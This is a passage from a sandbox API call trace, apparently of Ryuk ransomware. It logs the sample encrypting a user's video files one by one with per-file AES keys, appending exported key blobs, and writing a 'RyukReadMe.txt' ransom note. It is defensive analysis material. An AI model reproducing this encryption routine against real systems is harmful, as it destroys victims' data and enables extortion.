halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\0pve7\\mfrrzbglzhjaers.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0158.817] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=2897) returned 1 [0158.818] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=2897) returned 1 [0158.818] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xa2f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.818] ReadFile (in: hFile=0xd4, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0158.818] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.818] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0158.818] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.819] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.819] ReadFile (in: hFile=0xd4, lpBuffer=0x2760000, nNumberOfBytesToRead=0xb51, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xb51, lpOverlapped=0x0) returned 1 [0158.819] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0158.819] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xb51, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xb60) returned 1 [0158.819] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.819] WriteFile (in: hFile=0xd4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xb60, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xb60, lpOverlapped=0x0) returned 1 [0158.819] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0158.819] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0158.819] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0158.819] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0158.819] CloseHandle (hObject=0xd4) returned 1 [0158.850] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.855] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.855] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.855] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0158.855] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.856] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\0Pve7\\Qm_W24is5UXCn14XFH2z.swf", dwFileAttributes=0x80) returned 1 [0158.856] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\0Pve7\\Qm_W24is5UXCn14XFH2z.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\0pve7\\qm_w24is5uxcn14xfh2z.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0158.856] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=55924) returned 1 [0158.856] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=55924) returned 1 [0158.856] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xd952, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.856] ReadFile (in: hFile=0xd4, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0158.857] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.857] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0158.857] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.857] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.857] ReadFile (in: hFile=0xd4, lpBuffer=0x2760000, nNumberOfBytesToRead=0xda74, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xda74, lpOverlapped=0x0) returned 1 [0158.858] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0158.858] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xda74, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xda80) returned 1 [0158.859] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.859] WriteFile (in: hFile=0xd4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xda80, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xda80, lpOverlapped=0x0) returned 1 [0158.859] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0158.859] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0158.859] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0158.859] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0158.860] CloseHandle (hObject=0xd4) returned 1 [0158.878] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.883] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.883] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.883] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0158.883] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.883] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\0Pve7\\qYzIS_r.mp4", dwFileAttributes=0x80) returned 1 [0158.884] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\0Pve7\\qYzIS_r.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\0pve7\\qyzis_r.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0158.884] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=101113) returned 1 [0158.884] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=101113) returned 1 [0158.884] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x189d7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.884] ReadFile (in: hFile=0xd4, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0158.885] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.885] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0158.885] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.885] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.885] ReadFile (in: hFile=0xd4, lpBuffer=0x2760000, nNumberOfBytesToRead=0x18af9, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x18af9, lpOverlapped=0x0) returned 1 [0158.887] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0158.887] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x18af9, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x18b00) returned 1 [0158.888] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.888] WriteFile (in: hFile=0xd4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x18b00, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x18b00, lpOverlapped=0x0) returned 1 [0158.888] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0158.888] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0158.888] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0158.888] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0158.888] CloseHandle (hObject=0xd4) returned 1 [0158.906] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.912] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.912] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.912] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0158.912] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0158.912] SetLastError (dwErrCode=0x0) [0158.912] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\0Pve7\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\0pve7\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0158.913] GetLastError () returned 0x0 [0158.913] WriteFile (in: hFile=0xe4, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0158.914] CloseHandle (hObject=0xe4) returned 1 [0158.914] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0158.914] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.914] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\buJzsE jeB9.mkv", dwFileAttributes=0x80) returned 1 [0158.915] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\buJzsE jeB9.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\bujzse jeb9.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0158.915] GetFileSizeEx (in: hFile=0xe4, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=35421) returned 1 [0158.915] GetFileSizeEx (in: hFile=0xe4, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=35421) returned 1 [0158.915] SetFilePointerEx (in: hFile=0xe4, liDistanceToMove=0x893b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.915] ReadFile (in: hFile=0xe4, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0158.916] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.916] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0158.916] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.916] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.916] ReadFile (in: hFile=0xe4, lpBuffer=0x2760000, nNumberOfBytesToRead=0x8a5d, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x8a5d, lpOverlapped=0x0) returned 1 [0158.917] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0158.917] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x8a5d, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x8a60) returned 1 [0158.917] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.917] WriteFile (in: hFile=0xe4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x8a60, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x8a60, lpOverlapped=0x0) returned 1 [0158.917] WriteFile (in: hFile=0xe4, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0158.917] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0158.917] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0158.918] WriteFile (in: hFile=0xe4, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0158.918] CloseHandle (hObject=0xe4) returned 1 [0158.938] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.943] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.943] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.944] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0158.944] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.944] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\FEUM.avi", dwFileAttributes=0x80) returned 1 [0158.944] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\FEUM.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\feum.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0158.944] GetFileSizeEx (in: hFile=0xe4, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=46263) returned 1 [0158.945] GetFileSizeEx (in: hFile=0xe4, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=46263) returned 1 [0158.945] SetFilePointerEx (in: hFile=0xe4, liDistanceToMove=0xb395, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.945] ReadFile (in: hFile=0xe4, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0158.945] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.946] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0158.946] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.946] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.946] ReadFile (in: hFile=0xe4, lpBuffer=0x2760000, nNumberOfBytesToRead=0xb4b7, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0xb4b7, lpOverlapped=0x0) returned 1 [0158.947] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0158.947] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xb4b7, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xb4c0) returned 1 [0158.947] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.947] WriteFile (in: hFile=0xe4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xb4c0, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0xb4c0, lpOverlapped=0x0) returned 1 [0158.948] WriteFile (in: hFile=0xe4, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0158.948] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0158.948] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0158.948] WriteFile (in: hFile=0xe4, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0158.948] CloseHandle (hObject=0xe4) returned 1 [0158.967] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.973] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.973] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.973] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0158.973] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.974] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\FJ3EjlLP9Rc8Ndlsc_J.flv", dwFileAttributes=0x80) returned 1 [0158.974] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\FJ3EjlLP9Rc8Ndlsc_J.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\fj3ejllp9rc8ndlsc_j.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0158.974] GetFileSizeEx (in: hFile=0xe4, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=2024) returned 1 [0158.974] GetFileSizeEx (in: hFile=0xe4, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=2024) returned 1 [0158.975] SetFilePointerEx (in: hFile=0xe4, liDistanceToMove=0x6c6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.975] ReadFile (in: hFile=0xe4, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0158.975] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.975] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0158.976] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.976] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) 